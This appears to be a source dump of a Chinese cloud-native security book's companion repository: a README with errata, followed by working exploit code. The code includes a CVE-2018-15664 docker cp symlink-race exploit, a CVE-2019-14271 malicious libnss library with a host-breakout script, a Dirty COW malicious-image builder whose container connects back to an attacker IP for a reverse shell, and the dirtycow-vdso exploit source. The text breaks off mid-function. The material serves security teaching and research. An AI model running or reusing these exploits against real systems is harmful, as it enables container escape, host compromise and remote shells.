Repository: brant-ruan/cloud-native-security-book
Branch: main
Commit: 473a5642e953
Files: 49
Total size: 125.3 KB

Directory structure:
gitextract_faxozo3s/
├── README.md
└── code/
    ├── 0302-开发侧攻击/
    │   ├── 02-CVE-2018-15664/
    │   │   └── symlink_race/
    │   │       ├── build/
    │   │       │   ├── Dockerfile
    │   │       │   └── symlink_swap.c
    │   │       ├── run_read.sh
    │   │       └── run_write.sh
    │   └── 03-CVE-2019-14271/
    │       ├── breakout
    │       └── file-service.c
    ├── 0303-供应链攻击/
    │   ├── 01-CVE-2019-5021-alpine/
    │   │   └── Dockerfile
    │   └── 02-CVE-2016-5195-malicious-image/
    │       └── build.sh
    ├── 0304-运行时攻击/
    │   ├── 01-容器逃逸/
    │   │   ├── CVE-2016-5195/
    │   │   │   ├── 0xdeadbeef.c
    │   │   │   ├── Makefile
    │   │   │   └── payload.s
    │   │   ├── CVE-2019-5736/
    │   │   │   └── main.go
    │   │   ├── cause-core-dump.c
    │   │   └── tmp-dot-x.py
    │   ├── 02-安全容器逃逸/
    │   │   ├── build.sh
    │   │   ├── change_container_runtime.sh
    │   │   ├── clean_kata.sh
    │   │   ├── docker/
    │   │   │   ├── Dockerfile
    │   │   │   ├── attack.sh
    │   │   │   ├── bash
    │   │   │   └── evil_bin
    │   │   ├── evil_agent_src/
    │   │   │   ├── grpc.go
    │   │   │   └── mount.go
    │   │   ├── evil_bin.c
    │   │   ├── exploit.sh
    │   │   ├── get_kata_src.sh
    │   │   └── install_kata.sh
    │   └── 03-资源耗尽型攻击/
    │       ├── exhaust_cpu.sh
    │       ├── exhaust_disk.sh
    │       ├── exhaust_mem.sh
    │       └── exhaust_pid.sh
    ├── 0402-Kubernetes组件不安全配置/
    │   └── deploy_escape_pod_on_remote_host.sh
    ├── 0403-CVE-2018-1002105/
    │   ├── attacker.yaml
    │   ├── cve_2018_1002105_namespace.yaml
    │   ├── cve_2018_1002105_pod.yaml
    │   ├── cve_2018_1002105_role.yaml
    │   ├── cve_2018_1002105_role_binding.yaml
    │   ├── exploit.py
    │   └── test-token.csv
    ├── 0404-K8s拒绝服务攻击/
    │   ├── CVE-2019-11253-poc.sh
    │   └── CVE-2019-9512-poc.py
    └── 0405-云原生网络攻击/
        ├── Dockerfile
        ├── attacker.yaml
        ├── build_image.sh
        ├── cleanup.sh
        ├── exploit.sh
        ├── k8s_dns_mitm.py
        └── victim.yaml

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# Materials Repository for 《云原生安全:攻防实践与体系构建》

This repository provides supplementary materials and companion source code for the book 《云原生安全:攻防实践与体系构建》, so that interested readers can read further and practice hands-on.

**All content in this repository is for teaching and research purposes only. Illegal use is strictly forbidden, and violators bear all consequences!**

Related links: [Douban](https://book.douban.com/subject/35640762/) | [JD](https://item.jd.com/13495676.html) | [Dangdang](http://product.dangdang.com/29318802.html)

## Supplementary Reading Materials

- [100_云计算简介.pdf](appendix/100_云计算简介.pdf)
- [101_代码安全.pdf](appendix/101_代码安全.pdf)
- [200_容器技术.pdf](appendix/200_容器技术.pdf)
- [201_容器编排.pdf](appendix/201_容器编排.pdf)
- [202_微服务.pdf](appendix/202_微服务.pdf)
- [203_服务网格.pdf](appendix/203_服务网格.pdf)
- [204_DevOps.pdf](appendix/204_DevOps.pdf)
- [CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf](appendix/CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf)
- [CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf](appendix/CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf)
- [CVE-2020-8595:Istio认证绕过.pdf](appendix/CVE-2020-8595:Istio认证绕过.pdf)
- [靶机实验:综合场景下的渗透实战.pdf](appendix/靶机实验:综合场景下的渗透实战.pdf)

## Companion Source Code

|Code directory|Description|Location in the book|
|:-|:-|:-|
|[0302-开发侧攻击/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)|Exploit code for CVE-2018-15664|Section 3.2.2|
|[0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/03-CVE-2019-14271)|Exploit code for CVE-2019-14271|Section 3.2.3|
|[0303-供应链攻击/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/01-CVE-2019-5021-alpine)|Example of building a vulnerable image on top of an Alpine image affected by CVE-2019-5021|Section 3.3.1|
|[0303-供应链攻击/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/02-CVE-2016-5195-malicious-image)|Example of building a malicious image that exploits CVE-2016-5195|Section 3.3.2|
|[0304-运行时攻击/01-容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸)|Several code snippets for container escape|Section 3.4.1|
|[0304-运行时攻击/02-安全容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/02-安全容器逃逸)|Exploit code for escaping secure (sandboxed) containers|Section 3.4.2|
|[0304-运行时攻击/03-资源耗尽型攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/03-资源耗尽型攻击)|Example code for resource-exhaustion attacks|Section 3.4.3|
|[0402-Kubernetes组件不安全配置/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes组件不安全配置/)|Commands for exploiting insecure Kubernetes component configurations|Section 4.2|
|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|Exploit code for CVE-2018-1002105|Section 4.3|
|[0404-K8s拒绝服务攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s拒绝服务攻击/)|Exploit code for CVE-2019-11253 and CVE-2019-9512|Section 4.4|
|[0405-云原生网络攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-云原生网络攻击/)|Simulated network environment and example attack code for cloud native man-in-the-middle attacks|Section 4.5|

## Sharing and Exchange

You are welcome to follow the WeChat official account 绿盟科技研究通讯, where we will continue to publish high-quality research on the frontiers of information security:

![Search WeChat for "绿盟科技研究通讯"](images/yjtx.png)

## Notes

Some of the source code here comes from elsewhere on the Internet and is archived in this repository for readers' convenience. These sources and their origins are:

1. [0302-开发侧攻击/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race): https://seclists.org/oss-sec/2019/q2/131
2. [0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击): https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/
3. [0304-运行时攻击/01-容器逃逸/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195): https://github.com/scumjr/dirtycow-vdso
4. [0304-运行时攻击/01-容器逃逸/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736): https://github.com/Frichetten/CVE-2019-5736-PoC

The licenses of the referenced projects and code follow the original projects.

Source code modified by the authors is not listed here; the book cites the sources of all such references, and interested readers can consult them.

## Errata and Clarifications

### 1st Edition, 3rd Printing

#### P56 - 3.4.1 Container Escape

See [issue 9](https://github.com/Metarget/cloud-native-security-book/issues/9) for details.

Future printings will supplement and correct the original text in two places:

1. Add an explanation of why `#!/proc/self/exe` is necessary (non-dumpable -> dumpable); the CVE-2016-9962 vulnerability could be mentioned here.
2. State the context explicitly in the attack steps, removing the ambiguity of "achieving both the overwrite and the shellcode execution within a single runC invocation".

Thanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. We will supplement and correct this in subsequent printings.

#### P44 - 3.3.1 Image Vulnerability Exploitation

See [issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8) for details.

The image-build command near the bottom of page 44 is incomplete: it does not specify the build context directory. The correct command is as follows (note the `.` added at the end):

```bash
docker build --network=host -t alpine:cve-2019-5021 .
```

Thanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. We will correct this in subsequent printings.

#### P42 - 3.2.3 CVE-2019-14271: Loading Untrusted Dynamic Libraries

See [issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7) for details.

Thanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. To build glibc successfully, configure must be run first, and only then make. We will correct this in subsequent printings.

#### P42 - 3.2.3 CVE-2019-14271: Loading Untrusted Dynamic Libraries

See [issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6) for details.

Thanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. The steps in the book work as intended, but the approach proposed by [@XDTG](https://github.com/XDTG) is more natural and elegant. After verifying it, we are considering updating the approach in subsequent printings.

### 1st Edition, 1st Printing

#### P37 - 3.2.2 CVE-2018-15664: Symlink Replacement Vulnerability (a supplementary note; the original text contains no error)

The paragraph beginning on line 8 of the body text is rather hard to follow:

> The job of symlink_swap.c is to create, inside the container, a symbolic link pointing to the root directory "/", and to keep swapping the names of that symlink (passed in via a command-line argument, e.g. "/totally_safe_path") and a normal directory (e.g. "/totally_safe_path-stashed"). This way, when docker cp is executed on the host, if "/totally_safe_path" is first found to be a normal directory during the check, but has become a symbolic link by the time the copy operation is performed, Docker will resolve that symlink on the host.

In fact, inside the container, once the name swapping via renameat2 begins, `/totally_safe_path` and `/totally_safe_path-stashed` are effectively just two strings to us, no longer bound to the symlink or the normal directory; only at the moment the swapping stops is it determined again which string points to which (the symlink or the directory).

So at the point where the book says "This way, when docker cp is executed on the host, if first...", the name swapping inside the container has already started. What the user (or attacker) wants to docker cp is the file or directory named `/totally_safe_path` inside the container (the name means "a totally safe path"); that is the expectation, or rather the premise of this scenario. During the execution of docker cp, at the check stage the path string `/totally_safe_path` still points to a normal directory, but by the time of the copy operation, `/totally_safe_path` has been swapped to point to a symbolic link.

Thanks to reader @泡泡球麻麻君 for pointing this out.

#### P85 - 4.2.1 Unauthorized Access to the Kubernetes API Server (fixed in the 1st edition, 3rd printing)

The fourth line from the bottom of the body text is ambiguous:

> then as long as the network is reachable, an attacker can control the cluster through this port.

In fact, if only `--insecure-port=8080` is set, the service listens only on `localhost`, and a remote attacker normally cannot access it, even though it is "network reachable" from an IP perspective. For remote control, `--insecure-bind-address=0.0.0.0` must also be configured.

"Network reachable" here is actually meant to cover two situations:

1. with `--insecure-bind-address` set, the port is directly accessible from outside, i.e. the case above;
2. localhost can be reached in some way, which in turn includes:
    1. a local user leveraging the service on port 8080 to escalate privileges;
    2. reaching the localhost port remotely via techniques such as SSRF or DNS rebinding.

================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/Dockerfile
================================================
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

# Build the binary.
FROM opensuse/leap
RUN zypper in -y gcc glibc-devel-static
RUN mkdir /builddir
COPY symlink_swap.c /builddir/symlink_swap.c
RUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c

# Set up our malicious rootfs.
FROM opensuse/leap
ARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag
ARG SYMSWAP_PATH=/totally_safe_path
RUN echo "FAILED -- INSIDE CONTAINER PATH" >"$SYMSWAP_TARGET"
COPY --from=0 /builddir/symlink_swap /symlink_swap

ENTRYPOINT ["/symlink_swap"]
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/symlink_swap.c
================================================
/*
 * Copyright (C) 2018 Aleksa Sarai
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define usage() \
	do { printf("usage: symlink_swap <symlink_path>\n"); exit(1); } while(0)

#define bail(msg) \
	do { perror("symlink_swap: " msg); exit(1); } while (0)

/* No glibc wrapper for this, so wrap it ourselves. */
#define RENAME_EXCHANGE (1 << 1)
/*int renameat2(int olddirfd, const char *oldpath,
              int newdirfd, const char *newpath, int flags)
{
	return syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);
}*/

/* usage: symlink_swap <symlink_path> */
int main(int argc, char **argv)
{
	if (argc != 2)
		usage();
	char *symlink_path = argv[1];
	char *stash_path = NULL;
	if (asprintf(&stash_path, "%s-stashed", symlink_path) < 0)
		bail("create stash_path");

	/* Create a dummy file at symlink_path. */
	struct stat sb = {0};
	if (!lstat(symlink_path, &sb)) {
		int err;
		if (sb.st_mode & S_IFDIR)
			err = rmdir(symlink_path);
		else
			err = unlink(symlink_path);
		if (err < 0)
			bail("unlink symlink_path");
	}

	/*
	 * Now create a symlink to "/" (which will resolve to the host's root if we
	 * win the race) and a dummy directory at stash_path for us to swap with.
	 * We use a directory to remove the possibility of ENOTDIR which reduces
	 * the chance of us winning.
	 */
	if (symlink("/", symlink_path) < 0)
		bail("create symlink_path");
	if (mkdir(stash_path, 0755) < 0)
		bail("mkdir stash_path");

	/* Now we do a RENAME_EXCHANGE forever. */
	for (;;) {
		int err = renameat2(AT_FDCWD, symlink_path,
				    AT_FDCWD, stash_path, RENAME_EXCHANGE);
		if (err < 0)
			perror("symlink_swap: rename exchange failed");
	}
	return 0;
}
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_read.sh
================================================
#!/bin/zsh
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag

# Create our flag.
echo "SUCCESS -- COPIED FROM THE HOST" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 000 "$SYMSWAP_TARGET"

# Run and build the malicious image.
docker build -t cyphar/symlink_swap \
	--build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
	--build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")

# Now continually try to copy the files.
idx=0
while true
do
	mkdir "ex${idx}"
	docker cp "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" "ex${idx}/out"
	idx=$(($idx + 1))
done
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_write.sh
================================================
#!/bin/zsh
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag

# Create our flag.
echo "FAILED -- HOST FILE UNCHANGED" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 0444 "$SYMSWAP_TARGET"

# Run and build the malicious image.
docker build -t cyphar/symlink_swap \
	--build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
	--build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")

echo "SUCCESS -- HOST FILE CHANGED" | tee localpath

# Now continually try to copy the files.
while true
do
	docker cp localpath "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET"
done
================================================
FILE: code/0302-开发侧攻击/03-CVE-2019-14271/breakout
================================================
#!/bin/bash
umount /host_fs && rm -rf /host_fs
mkdir /host_fs
mount -t proc none /proc  # mount the host's procfs over /proc
cd /proc/1/root           # chdir to host's root
mount --bind . /host_fs   # mount host root at /host_fs
================================================
FILE: code/0302-开发侧攻击/03-CVE-2019-14271/file-service.c
================================================
// content should be added into nss/nss_files/files-service.c
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>

#define ORIGINAL_LIBNSS "/original_libnss_files.so.2"
#define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2"

bool is_priviliged();

__attribute__ ((constructor)) void run_at_link(void)
{
	char * argv_break[2];
	if (!is_priviliged())
		return;
	rename(ORIGINAL_LIBNSS, LIBNSS_PATH);
	if (!fork()) {
		// Child runs breakout
		argv_break[0] = strdup("/breakout");
		argv_break[1] = NULL;
		execve("/breakout", argv_break, NULL);
	}
	else
		wait(NULL); // Wait for child
	return;
}

bool is_priviliged()
{
	FILE * proc_file = fopen("/proc/self/exe", "r");
	if (proc_file != NULL) {
		fclose(proc_file);
		return false; // can open so /proc exists, not privileged
	}
	return true; // we're running in the context of docker-tar
}
================================================
FILE: code/0303-供应链攻击/01-CVE-2019-5021-alpine/Dockerfile
================================================
FROM alpine:3.5
RUN apk add --no-cache shadow
RUN adduser -S non_root
USER non_root
================================================
FILE: code/0303-供应链攻击/02-CVE-2016-5195-malicious-image/build.sh
================================================
#!/bin/bash
# modify ATTACKER_IP and ATTACKER_PORT before building
ATTACKER_IP=REVERSE_SHELL_IP
ATTACKER_PORT=REVERSE_SHELL_PORT
TEMP_DIR=./temp-dirtycow

set -e -x

# build ExP
sudo apt update && sudo apt install -y build-essential nasm
mkdir -p $TEMP_DIR
git clone https://github.com/scumjr/dirtycow-vdso.git $TEMP_DIR
cd $TEMP_DIR
make
cd ..

# build malicious image
cat << EOF > ./Dockerfile
FROM ubuntu:18.04
ADD $TEMP_DIR/0xdeadbeef /entrypoint
RUN chmod u+x /entrypoint
ENTRYPOINT ["/entrypoint", "$ATTACKER_IP:$ATTACKER_PORT"]
EOF
sudo docker build -t cve-2016-5195:v1.0 .
rm ./Dockerfile rm -rf $TEMP_DIR ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/0xdeadbeef.c ================================================ /* * CVE-2016-5195 POC * -scumjr */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "payload.h" #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif #define PATTERN_IP "\xde\xc0\xad\xde" #define PATTERN_PORT "\x37\x13" #define PATTERN_PROLOGUE "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define PAYLOAD_IP INADDR_LOOPBACK #define PAYLOAD_PORT 1234 #define LOOP 0x10000 #define VDSO_SIZE (2 * PAGE_SIZE) #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof(arr[0])) typedef unsigned int uint32_t; typedef unsigned long uint64_t; struct vdso_patch { unsigned char *patch; unsigned char *copy; size_t size; void *addr; }; struct payload_patch { const char *name; void *pattern; size_t pattern_size; void *buf; size_t size; }; struct prologue { char *opcodes; size_t size; }; struct mem_arg { void *vdso_addr; bool do_patch; bool stop; unsigned int patch_number; }; static char child_stack[8192]; static struct vdso_patch vdso_patch[2]; static struct prologue prologues[] = { /* push rbp; mov rbp, rsp; lfence */ { "\x55\x48\x89\xe5\x0f\xae\xe8", 7 }, /* push rbp; mov rbp, rsp; push r14 */ { "\x55\x48\x89\xe5\x41\x57", 6 }, /* push rbp; mov rbp, rdi; push rbx */ { "\x55\x48\x89\xfd\x53", 5 }, /* push rbp; mov rbp, rsp; xchg rax, rax */ { "\x55\x48\x89\xe5\x66\x66\x90", 7 }, /* push rbp; cmp edi, 1; mov rbp, rsp */ { "\x55\x83\xff\x01\x48\x89\xe5", 7 }, }; static int writeall(int fd, const void *buf, size_t count) { const char *p; ssize_t i; p = buf; do { i = write(fd, p, count); if (i == 0) { return -1; } else if (i == -1) { if (errno == EINTR) continue; return -1; } count -= i; p += i; } while (count > 0); return 0; } static void 
*get_vdso_addr(void) { return (void *)getauxval(AT_SYSINFO_EHDR); } static int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n) { const unsigned char *s; unsigned long value; unsigned char *d; d = dest; s = src; while (n >= sizeof(long)) { memcpy(&value, s, sizeof(value)); if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) { warn("ptrace(PTRACE_POKETEXT)"); return -1; } n -= sizeof(long); d += sizeof(long); s += sizeof(long); } if (n > 0) { d -= sizeof(long) - n; errno = 0; value = ptrace(PTRACE_PEEKTEXT, pid, d, NULL); if (value == -1 && errno != 0) { warn("ptrace(PTRACE_PEEKTEXT)"); return -1; } memcpy((unsigned char *)&value + sizeof(value) - n, s, n); if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) { warn("ptrace(PTRACE_POKETEXT)"); return -1; } } return 0; } static int patch_payload_helper(struct payload_patch *pp) { unsigned char *p; p = memmem(payload, payload_len, pp->pattern, pp->pattern_size); if (p == NULL) { fprintf(stderr, "[-] failed to patch payload's %s\n", pp->name); return -1; } memcpy(p, pp->buf, pp->size); p = memmem(payload, payload_len, pp->pattern, pp->pattern_size); if (p != NULL) { fprintf(stderr, "[-] payload's %s pattern was found several times\n", pp->name); return -1; } return 0; } /* * A few bytes of the payload must be patched: prologue, ip, and port. 
*/ static int patch_payload(struct prologue *p, uint32_t ip, uint16_t port) { int i; struct payload_patch payload_patch[] = { { "port", PATTERN_PORT, sizeof(PATTERN_PORT)-1, &port, sizeof(port) }, { "ip", PATTERN_IP, sizeof(PATTERN_IP)-1, &ip, sizeof(ip) }, { "prologue", PATTERN_PROLOGUE, sizeof(PATTERN_PROLOGUE)-1, p->opcodes, p->size }, }; for (i = 0; i < ARRAY_SIZE(payload_patch); i++) { if (patch_payload_helper(&payload_patch[i]) == -1) return -1; } return 0; } /* make a copy of vDSO to restore it later */ static int save_orig_vdso(void) { struct vdso_patch *p; int i; for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) { p = &vdso_patch[i]; p->copy = malloc(p->size); if (p->copy == NULL) { warn("malloc"); return -1; } memcpy(p->copy, p->addr, p->size); } return 0; } static int build_vdso_patch(void *vdso_addr, struct prologue *prologue) { uint32_t clock_gettime_offset, target; unsigned long clock_gettime_addr; unsigned char *p, *buf; uint64_t entry_point; int i; /* e_entry */ p = vdso_addr; entry_point = *(uint64_t *)(p + 0x18); clock_gettime_offset = (uint32_t)entry_point & 0xfff; clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset; /* patch #1: put payload at the end of vdso */ vdso_patch[0].patch = payload; vdso_patch[0].size = payload_len; vdso_patch[0].addr = (unsigned char *)vdso_addr + VDSO_SIZE - payload_len; p = vdso_patch[0].addr; for (i = 0; i < payload_len; i++) { if (p[i] != '\x00') { fprintf(stderr, "failed to find a place for the payload\n"); return -1; } } /* patch #2: hijack clock_gettime prologue */ buf = malloc(sizeof(PATTERN_PROLOGUE)-1); if (buf == NULL) { warn("malloc"); return -1; } /* craft call to payload */ target = VDSO_SIZE - payload_len - clock_gettime_offset; memset(buf, '\x90', sizeof(PATTERN_PROLOGUE)-1); buf[0] = '\xe8'; *(uint32_t *)&buf[1] = target - 5; vdso_patch[1].patch = buf; vdso_patch[1].size = prologue->size; vdso_patch[1].addr = (unsigned char *)clock_gettime_addr; save_orig_vdso(); return 0; } static int 
backdoor_vdso(pid_t pid, unsigned int patch_number) { struct vdso_patch *p; p = &vdso_patch[patch_number]; return ptrace_memcpy(pid, p->addr, p->patch, p->size); } static int restore_vdso(pid_t pid, unsigned int patch_number) { struct vdso_patch *p; p = &vdso_patch[patch_number]; return ptrace_memcpy(pid, p->addr, p->copy, p->size); } /* * Check if vDSO is entirely patched. This function is executed in a different * memory space thanks to fork(). Return 0 on success, 1 otherwise. */ static void check(struct mem_arg *arg) { struct vdso_patch *p; void *src; int i, ret; p = &vdso_patch[arg->patch_number]; src = arg->do_patch ? p->patch : p->copy; ret = 1; for (i = 0; i < LOOP; i++) { if (memcmp(p->addr, src, p->size) == 0) { ret = 0; break; } usleep(100); } exit(ret); } static void *madviseThread(void *arg_) { struct mem_arg *arg; arg = (struct mem_arg *)arg_; while (!arg->stop) { if (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) { warn("madvise"); break; } } return NULL; } static int debuggee(void *arg_) { if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) == -1) err(1, "prctl(PR_SET_PDEATHSIG)"); if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) err(1, "ptrace(PTRACE_TRACEME)"); kill(getpid(), SIGSTOP); return 0; } /* use ptrace to write to read-only mappings */ static void *ptrace_thread(void *arg_) { int flags, ret2, status; struct mem_arg *arg; pid_t pid; void *ret; arg = (struct mem_arg *)arg_; flags = CLONE_VM|CLONE_PTRACE; pid = clone(debuggee, child_stack + sizeof(child_stack) - 8, flags, arg); if (pid == -1) { warn("clone"); return NULL; } if (waitpid(pid, &status, __WALL) == -1) { warn("waitpid"); return NULL; } ret = NULL; while (!arg->stop) { if (arg->do_patch) ret2 = backdoor_vdso(pid, arg->patch_number); else ret2 = restore_vdso(pid, arg->patch_number); if (ret2 == -1) { ret = NULL; break; } } if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) warn("ptrace(PTRACE_CONT)"); if (waitpid(pid, NULL, __WALL) == -1) warn("waitpid"); return ret; } static int 
exploit_helper(struct mem_arg *arg) { pthread_t pth1, pth2; int ret, status; pid_t pid; fprintf(stderr, "[*] %s: patch %d/%ld\n", arg->do_patch ? "exploit" : "restore", arg->patch_number + 1, ARRAY_SIZE(vdso_patch)); /* run "check" in a different memory space */ pid = fork(); if (pid == -1) { warn("fork"); return -1; } else if (pid == 0) { check(arg); } arg->stop = false; pthread_create(&pth1, NULL, madviseThread, arg); pthread_create(&pth2, NULL, ptrace_thread, arg); /* wait for "check" process */ if (waitpid(pid, &status, 0) == -1) { warn("waitpid"); return -1; } /* tell the 2 threads to stop and wait for them */ arg->stop = true; pthread_join(pth1, NULL); pthread_join(pth2, NULL); /* check result */ ret = WIFEXITED(status) ? WEXITSTATUS(status) : -1; if (ret == 0) { fprintf(stderr, "[*] vdso successfully %s\n", arg->do_patch ? "backdoored" : "restored"); } else { fprintf(stderr, "[-] failed to win race condition...\n"); } return ret; } /* * Apply vDSO patches in the correct order. * * During the backdoor step, the payload must be written before hijacking the * function prologue. During the restore step, the prologue must be restored * before removing the payload. 
*/ static int exploit(struct mem_arg *arg, bool do_patch) { unsigned int i; int ret; ret = 0; arg->do_patch = do_patch; for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) { if (do_patch) arg->patch_number = i; else arg->patch_number = ARRAY_SIZE(vdso_patch) - i - 1; if (exploit_helper(arg) != 0) { ret = -1; break; } } return ret; } static int create_socket(uint16_t port) { struct sockaddr_in addr; int enable, s; s = socket(AF_INET, SOCK_STREAM, 0); if (s == -1) { warn("socket"); return -1; } enable = 1; if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) == -1) warn("setsockopt(SO_REUSEADDR)"); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = port; if (bind(s, (struct sockaddr *) &addr, sizeof(addr)) == -1) { warn("failed to bind socket on port %d", ntohs(port)); close(s); return -1; } if (listen(s, 1) == -1) { warn("listen"); close(s); return -1; } return s; } /* interact with reverse connect shell */ static int yeah(struct mem_arg *arg, int s) { struct sockaddr_in addr; struct pollfd fds[2]; socklen_t addr_len; char buf[4096]; nfds_t nfds; int c, n; fprintf(stderr, "[*] waiting for reverse connect shell...\n"); addr_len = sizeof(addr); while (1) { c = accept(s, (struct sockaddr *)&addr, &addr_len); if (c == -1) { if (errno == EINTR) continue; warn("accept"); return -1; } break; } close(s); fprintf(stderr, "[*] enjoy!\n"); if (fork() == 0) { if (exploit(arg, false) == -1) fprintf(stderr, "[-] failed to restore vDSO\n"); exit(0); } fds[0].fd = STDIN_FILENO; fds[0].events = POLLIN; fds[1].fd = c; fds[1].events = POLLIN; nfds = 2; while (nfds > 0) { if (poll(fds, nfds, -1) == -1) { if (errno == EINTR) continue; warn("poll"); break; } if (fds[0].revents == POLLIN) { n = read(STDIN_FILENO, buf, sizeof(buf)); if (n == -1) { if (errno != EINTR) { warn("read(STDIN_FILENO)"); break; } } else if (n == 0) { break; } else { writeall(c, buf, 